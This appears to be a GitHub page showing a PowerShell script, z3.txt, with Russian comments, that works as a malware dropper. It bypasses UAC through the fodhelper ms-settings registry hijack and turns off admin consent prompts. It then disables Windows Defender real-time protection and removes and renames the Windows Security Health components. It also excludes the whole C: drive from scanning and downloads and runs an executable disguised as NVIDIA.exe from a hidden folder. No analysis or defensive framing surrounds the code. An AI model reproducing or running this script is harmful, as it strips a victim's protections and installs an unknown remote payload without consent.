-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathz3.txt
71 lines (59 loc) · 3.93 KB
/
z3.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# Проверка архитектуры процессора и выполнение соответствующего действия
if ($env:PROCESSOR_ARCHITECTURE -eq "amd64") {
if (Test-Path "$env:SYSTEMROOT\SysWOW64\cacls.exe") {
Start-Process "$env:SYSTEMROOT\SysWOW64\cacls.exe" -ArgumentList "$env:SYSTEMROOT\SysWOW64\config\system" -NoNewWindow -Wait
}
} else {
if (Test-Path "$env:SYSTEMROOT\system32\cacls.exe") {
Start-Process "$env:SYSTEMROOT\system32\cacls.exe" -ArgumentList "$env:SYSTEMROOT\system32\config\system" -NoNewWindow -Wait
}
}
# Если ошибка, инициируем запрос UAC
if ($LASTEXITCODE -ne 0) {
Set-RegistryKeysForUACPrompt
Start-Process "fodhelper.exe"
Start-Process PowerShell -ArgumentList "-Command `\"Start-Process '$($MyInvocation.MyCommand.Path)' -Verb RunAs`\""
exit
} else {
# Если есть админские права, продолжаем выполнение
ExecuteAdminTasks
}
# Функция для настройки реестра и запуска UAC запроса
function Set-RegistryKeysForUACPrompt {
# Добавление ключей реестра для обхода UAC
Set-ItemProperty -Path "HKCU:\SOFTWARE\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
Set-ItemProperty -Path "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value " "
}
# Функция для выполнения административных задач
function ExecuteAdminTasks {
# Переход в рабочую директорию
Push-Location $PSScriptRoot
# Выполнение команд в реестре для отключения защиты Windows Defender
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord
# Удаление элемента из реестра
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityHealth"
# Изменение прав на файлы и переименование
Take-OwnershipAndRename "C:\Windows\System32\SecurityHealthService.exe" "Celka.sej"
Take-OwnershipAndRename "C:\Windows\System32\SecurityHealthSystray.exe" "Nurik.nes"
# Остановка процесса
Stop-Process -Name "SecurityHealthSystray" -Force
# Добавление пути в исключения Windows Defender
Add-MpPreference -ExclusionPath "C:\"
# Ожидание
Start-Sleep -Seconds 10
# Создание скрытой директории и скачивание файла
New-Item -Path "C:\ProgramData\QQQ" -ItemType Directory -Force
Set-ItemProperty -Path "C:\ProgramData\QQQ" -Name "Attributes" -Value "Hidden"
Invoke-WebRequest -Uri "https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIA.exe" -OutFile "C:\ProgramData\QQQ\NVIDIA.exe"
# Запуск скачанного файла
Start-Process "C:\ProgramData\QQQ\NVIDIA.exe"
}
# Функция для взятия на себя прав на файл и его переименования
function Take-OwnershipAndRename($filePath, $newName) {
takeown /f $filePath
icacls $filePath /grant:r "$env:USERDOMAIN\$env:USERNAME":F /c
Rename-Item -Path $filePath -NewName $newName
}